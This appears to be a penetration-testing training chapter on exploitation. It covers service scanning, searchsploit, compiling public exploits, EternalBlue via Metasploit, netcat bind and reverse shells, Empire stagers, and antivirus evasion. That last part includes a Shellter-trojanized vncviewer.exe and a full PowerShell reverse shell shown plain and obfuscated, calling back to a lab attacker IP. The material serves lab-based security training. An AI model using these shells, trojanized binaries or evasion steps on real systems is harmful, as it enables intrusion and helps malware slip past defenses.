Exploitation

⚡ Prerequisites
Basic familiarity with Linux & Windows
Basic understanding of TCP & UDP protocols
Basic familiarity with Metasploit
📕 Learning Objectives
Identify services vulnerabilities
Search for and manipulate public exploit code
Utilize exploitation frameworks, bind & reverse shells
Perform exploitation in a black box pentest
Evade signature-based antivirus solutions
🔬 Training list - PentesterAcademy/INE Labs
subscription required
Linux Exploitation - Metasploit
Win Post Exploitation - Metasploit
Linux Services Exploitation
🔬 Home Labs
Metasploitable2
Metasploitable3

Exploitation Introduction

🗒️ Exploitation is a phase of a penetration test that focuses on establishing access, initial foothold, to a system or resource by bypassing security restrictions.

With a proper vulnerability analysis, the exploitation attack vector should focus on the success probability and the high value target assets with the highest impact on the scanned organization.

The use of automated exploitation tools (Metasploit, Powershell Empire, etc) shouldn't be prevalent
Exploitation methodology:
- Identify Vulnerable Services
- Prepare Exploit Code
- Gaining Remote access
- Bypass AV detection
- Pivoting

Vulnerability Scanning

Identify running and vulnerable services

Banner Grabbing

🗒️ Banner grabbing is the info gathering manual or automatic process used to obtain software and services name and version. The host server displays a text with this information as a banner.

Tools and techniques:

nmap service version detection scan
Netcat connection
Authentication with a supported service
curl / wget to get headers details of an HTTP server

🔬 Check the SSH Enumeration Lab here

Some useful commands from the lab environment:

nmap

nmap -sV -O <TARGET_IP>
	
	22/tcp open  ssh   OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)

ls -al /usr/share/nmap/scripts | grep banner
nmap -sV --script=banner <TARGET_IP>

	|_banner: SSH-2.0-OpenSSH_7.2p2 Ubuntu 4ubuntu2.6

nc / netcat

nc <TARGET_IP> <TARGET_OPEN_PORT>
nc <TARGET_IP> 22

	SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.6

SSH Authentication

ssh root@<TARGET_IP>
	Welcome to attack defense ssh recon lab!! # SSH Welcome Banner

Nmap Scripts

🗒️ Nmap Engine Scripting (NSE) - an nmap feature that allows to write simple scripts to automate a wide variety of tasks, like:

network discovery
sophisticated version detection
vulnerability detection and exploitation
backdoor detection

Scripts are written using the Lua programming language.

Nmap script default directory is:

/usr/share/nmap/scripts

ls -al /usr/share/nmap/scripts | grep <keyword>

🔬 Check the Bash - ShellShock Lab here

Some useful commands and nmap script scan from the lab environment:

nmap -sV -O <TARGET_IP>
	80/tcp open  http  Apache httpd 2.4.6 ((Unix))

nmap -sV -p 80 --script=http-enum <TARGET_IP>

ls -al /usr/share/nmap/scripts | grep shellshock

nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" <TARGET_IP>

# Vulnerable to the CVE-2014-6271

Metasploit

Focus on the techniques and the flow to detect vulnerabilities.

🔬 Home Lab based on a Windows 7/2008 R2 target vulnerable to EternalBlue SMB RCE. Check the Lab 2 here

sudo nmap -sS -sV <TARGET_IP>

searchsploit EternalBlue
searchsploit ms17-010

# Check the vulnerability with a scanner, before trying to exploit it
msfconsole

search eternalblue
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <TARGET_IP>
run

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET_IP>
run

Searching for Exploits

Exploit code can be found online or inside locally-stored exploit database in pentest Linux distributions (searchsploit, MSF).

Verifiable online sources:

exploit-db.com
- always check for the Verified column
- use search filters
- Dorks - Google Hacking Database
Rapid7 db

❗ Always pay attention at publicly available exploits. An exploit can be weaponized to attack the actual attacker system!
📌 Analyze the exploit code behavior to ensure that it works as intended.

Searchsploit

🗒️ searchsploit - command line search tool for Exploit-Db that allows to have an offline copy of the Exploit-Db.

Useful for security assessments on networks without Internet access
Pre-packed with Kali Linux
exploitdb local directory is:
- /usr/share/exploitdb

# Debian-based distro install
sudo apt update && sudo apt -y install exploitdb

ls -al /usr/share/exploitdb

# Update the exploitdb package updates
searchsploit -u

searchsploit [options] <term>
searchsploit vsftpd 2.3.4

# Copy an exploit to the current working dir
searchsploit -m 49757    

# Case sensitive search
searchsploit -c OpenSSH

# Search just the exploit title
searchsploit -t vsftpd

# Exact search on title
searchsploit -e "Windows 7"

# Filters search
searchsploit remote windows smb
searchsploit remote linux ssh
searchsploit remote linux ssh OpenSSH
searchsploit remote webapps wordpress
searchsploit local windows
searchsploit local windows | grep -e "Microsoft"

# List online links
searchsploit -w remote windows smb | grep -e "EternalBlue"

Fixing Exploits

🔬 Check the Fixing Exploits Lab here

Cross-Compiling Exploits

Exploit code developed in C, C++, C# has to be compiled into a portable executable or binary.

🗒️ Cross-compilation is the process of building on one platform a binary that will run on another platform.

Compiling C code is a necessary skill

📌 ExploitDB bin-sploits - useful for pre-compiled binaries

e.g. of Windows and Linux exploit code compiling

Tools:

MinGW-w64

sudo apt -y install mingw-w64 gcc

Windows

Download the VLC exploit or use searchsploit

searchsploit VideolAN VLC SMB
searchsploit -m 9303

Compile the C exploit
- check for comments in the code regarding the compilation commands

# Compile for x64
x86_64-w64-mingw32-gcc 9303.c -o exploit64.exe

# Compile for x86 (32-bit)
i686-w64-mingw32-gcc 9303.c -o exploit32.exe

Linux

Download the DirtyCow exploit or use searchsploit

searchsploit Dirty Cow
searchsploit -m 40839

Compile the C exploit
- check for comments in the code regarding the compilation commands to compile it successfully

# Compile with
gcc -pthread 40839.c -o dirty_exploit -lcrypt

Bind & Reverse Shells

Netcat

nc - a network utility used for a variety of tasks associated with TCP/UDP.

Client mode - used for connection to any TCP/UDP port or to a listener
Server Mode - used as a listener for connection from clients on a specific port

Functionalities:

open TCP connections, listen on TCP or UDP ports
Banner grabbing, Port scanning, Files transferring
Bind/Reverse shells
📌 Hacking with Netcat

# Debian based distro - install
sudo apt update && sudo apt install -y netcat

🔬 Some HFS Lab commands

nc <TARGET_IP> <TARGET_PORT>
nc -nv 10.2.23.227 80
# -n = no DNS resolution
# -v = verbose

nc -nvu 10.2.23.227 445
# -u = UDP port

Setup a listener:

Transfer nc.exe to the windows target

# Attacker machine
ip -br -c a
	10.10.24.4/24
cd /usr/share/windows-binaries/
python -m SimpleHTTPServer 80


# Target machine
cd Desktop
certutil -urlcache -f http://10.10.24.4/nc.exe nc.exe

Setup a listener on the attacker machine

# Attacker machine
nc -nvlp 1234
nc -nvlup 1234 # listen on a UDP port


# Target machine
nc.exe -nv 10.10.24.4 1234
nc.exe -nvu 10.10.24.4 1234

# A connection is received on the Attacker machine

Transfer files with nc

# A listener must be present on the target system
# Target machine
nc.exe -nvlp 1234 > test.txt

# Attacker machine
echo "Hello target" > test.txt
nc -nv 10.2.23.227 1234 < test.txt

Bind Shells

📌 Bind and Reverse shells

🗒️ Bind Shell - a remote shell where the attacker connects to the listener running on the target system and execute commands on the target system.

Bind shells issues:
- Must have access to the target system
- Inbound traffic can be blocked by a firewall, it is very suspect
A netcat listener must be configured on the target system to execute:
cmd.exe - Windows
/bin/bash - Linux

🔬 Same lab as above (IPs might change)

Once uploaded the nc.exe on the target system, proceed with the bind shell

# Target Win machine - Bind shell listener with executable cmd.exe
nc.exe -nvlp 1234 -e cmd.exe

# Attacker Linux machine
nc -nv 10.2.22.140 1234

# Target Linux machine - Bind shell listener with /bin/bash
nc -nvlp 1234 -c /bin/bash

# Attacker Win machine
nc.exe -nv 10.10.24.2 1234

Reverse Shells

🗒️ Reverse Shell - a remote shell where the target connects to a listener running on the attacker's system (e.g. Metasploit Meterpreter).

Reverse shells advantages:
- The connection can be initialized without netcat too
- Outgoing traffic may not be blocked by firewalls
Reverse shells issues:
- used exploit have to know the attacker's IP
- the attacker's IP can be logged as malicious or present in the exploit file

# Attacker Linux machine
nc -nvlp 1234

# Target Win machine
nc.exe -nv 10.10.18.3 1234 -e cmd.exe

# Attacker Linux machine
nc -nvlp 1234

# Target Linux machine (localhost in this case)
nc -nv 127.0.0.1 1234 -e /bin/bash

Reverse Shell without Netcat

📌 PayloadsAllTheThings - Reverse Shell Cheatsheet

Examples of Reverse Shell with different code (bash, Python, Powershell, PHP, etc)

📌 Reverse Shell Generator

e.g.

# Kali Linux attacker machine
nc -nvlp 9001

# Windows target machine
# Run CMD and paste the code below
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.31.128',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Exploitation Frameworks

The Metasploit Framework

Focus on the Exploitation phase
Modular
MSF turns the exploit code into a module, using the Ruby programming language

🔬 Check the Workflow Platform Lab here

PowerShell-Empire

Empire - PowerShell post-exploitation framework for Win, Linux and macOS

Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.

PowerShell-Empire is primarily designed for Windows targets
Starkiller - GUI frontend for PowerShell-Empire
Kali Linux install

sudo apt update && sudo apt install -y powershell-empire

🔬 Home Lab based on a Kali Linux attacker VM and Win7 target VM with IP 192.168.31.131

sudo powershell-empire server

In another terminal tab

sudo powershell-empire client

listeners
agents

Open Starkiller
- http://localhost:1337/index.html#/
- Credentials: empireadmin:password123

Run the csharpserver

Create a http listener to receive the reverse connection from the target system

Generate a Stager with windows_csharp_exe type

Actions - Download the Sharpire.exe stager

# Open a new terminal window
cd Downloads
python3 -m http.server 80

# On the Windows VM download the Sharpire.exe from http://192.168.31.128/
# Run it

Back on the Starkiller Agents page, check for the active agent

Back in the Empire terminal session

agents
interact <ID>
history

Windows Black Box Exploitation

🗒️ Black Box penetration test - security assessment conducted without any internal system or network knowledge.

The pentester act like an external unprivileged hacker from outside the network
No information about the target system

Typical Black Box Methodology:

Host discovery ➡️ Port Scanning ➡️ Enumeration
Vulnerability detection
Exploitation ➡️ Manual/Automated
Post Exploitation - PrivEsc ➡️ Persistence ➡️ Dumping Hashes

e.g.

Scenario

Penetration Test to gain access and exploit a Win Server 2008 host.

Scope

Identify running and vulnerable services on the target
Exploit the vulnerabilities to obtain a foothold

🔬 The techniques will be covered in the dedicated Win Black Box Pentest Lab here. This is a lab containing a Metasploitable3 target.
Identify easily exploitable services
Pick the target as efficiently as possible
Time is a factor

Linux Black Box Exploitation

Scenario

Penetration Test to gain access and exploit a Linux server host.

Scope

Identify running and vulnerable services on the target
Exploit the vulnerabilities to obtain a foothold and gain access to the system

🔬 The techniques will be covered in the dedicated Linux Black Box Pentest Lab here. This is a lab containing a Metasploitable2 target.

AV Evasion & Obfuscation

🗒️ Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. (MITRE)

Antivirus detection methods can be classified as follows:

Method

Description

Signature based detection

A signature is a static unique sequence of bytes of known malware, created using essential elements of an analyzed file. The AV comes with a signature database

Heuristic base detection

Statically examine files for suspicious specific characteristics, relying on rules to determine a malicious binary

Behavior based detection

Monitor malware for suspicious behavior

On-disk Evasion techniques
- Obfuscation - The act of hiding anything crucial, useful, or vital. Code is reorganized through obfuscation to make it more difficult to decipher or reverse engineer.
- Encoding - The process of transforming data into a new format using an encoding strategy. Data can be encoded to a new format and then decoded back to its original format since encoding is a reversible operation.
- Packing - Generate executables with updated binary structures, lower in size and a new payload's signature.
- Crypters - Encrypts payloads, then the encrypted code is decrypted in memory. The decryption key is typically kept in a stub. (ransomware)
In-memory Evasion techniques
- Memory manipulation rather than writing files to disk
- Payload is injected into a process, then executed in memory in a separate thread

Shellter

Shellter - dynamic shellcode injection tool and dynamic PE (Portable Executable) infector ever created.

Uses a unique dynamic approach based on the execution flow of the target app
Takes advantage of the original structure of the PE file
Supports any 32-bit payload (generated either by metasploit or custom ones by the user)
Portable
Compatible with Windows x86/x64 (XP SP3 and above) & Wine/CrossOver for Linux/Mac

🔬 Home lab with Kali Linux and Win7 VMs

Shellter Kali Linux Installation:

sudo apt update && sudo apt install -y shellter

# Wine64 will be automatically installed
# Win32 needs additional commands to install it
sudo dpkg --add-architecture i386 && sudo apt update && sudo apt -y install wine32
rm -r ~/.wine

cd /usr/share/windows-resources/shellter

Execute an exe file on Linux

sudo shellter

Inject the shellcode into/usr/share/windows-binaries/vncviewer.exe file after copying it to a folder

mkdir AVBypass
cd AVBypass
cp /usr/share/windows-binaries/vncviewer.exe .

In the SHELLTER windows, choose A for automatic
PE Target: /home/kali/certs/ejpt/AVBypass/vncviewer.exe

Stealth Mode: Y = vncviewer will function as normal and the shellcode will be executed in the background
Payload: L - 1
LHOST: Attacker's IP - 192.168.31.128
LPORT: 1234

Now the /home/kali/certs/ejpt/AVBypass/vncviewer.exe file has been replaced by the Shellter generated malicious executable
Copy the vncviewer.exe file to the target machine

# Attacker VM
cd /home/kali/certs/ejpt/AVBypass/
sudo python -m http.server 80

# In another terminal
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run

Run the vncviewer.exe file and chheck the msfconsole Meterpreter session

PowerShell Code Obfuscation

Invoke-Obfuscation - a PowerShell v2.0+ compatible PowerShell command and script obfuscator.

🔬 Home lab with Kali Linux and Win7 VMs

Kali Linux install PowerShell

cd /opt
sudo git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
sudo apt update && sudo apt install -y powershell

Run pwsh

pwsh
cd /opt/Invoke-Obfuscation/
Import-Module ./Invoke-Obfuscation.psd1
cd ..
Invoke-Obfuscation

Create the reverse PowerShell script in a new file
- PowerShell Reverse Shell code will be

cd /home/kali/certs/ejpt/AVBypass/    
nano shell.ps1

$client = New-Object System.Net.Sockets.TCPClient('192.168.31.128',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Back in Invoke-Obfuscation

SET SCRIPTPATH /home/kali/certs/ejpt/AVBypass/shell.ps1
AST
ALL
1

Obfuscated code is:

Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPClient('192.168.31.128',4242));Set-Variable -Name stream -Value ($client.GetStream());[byte[]]$bytes = 0..65535|%{0};while((Set-Variable -Name i -Value ($stream.Read($bytes, 0, $bytes.Length))) -ne 0){;Set-Variable -Name data -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i));Set-Variable -Name sendback -Value (iex $data 2>&1 | Out-String );Set-Variable -Name sendback2 -Value ($sendback + 'PS ' + (pwd).Path + '> ');Set-Variable -Name sendbyte -Value (([text.encoding]::ASCII).GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

cd /home/kali/certs/ejpt/AVBypass/    
nano obfuscated.ps1

# Attacker VM another terminal
cd /home/kali/certs/ejpt/AVBypass/
sudo python -m http.server 80

nc -nvlp 4242

Run the obfuscated.ps1 file on the Win10 VM

Back on the Kali VM check the PowerShell reverse shell

Previous🔬Linux Post Exploitation - MSF Next🔬Fixing Exploits - HFS

Last updated 2 years ago

Was this helpful?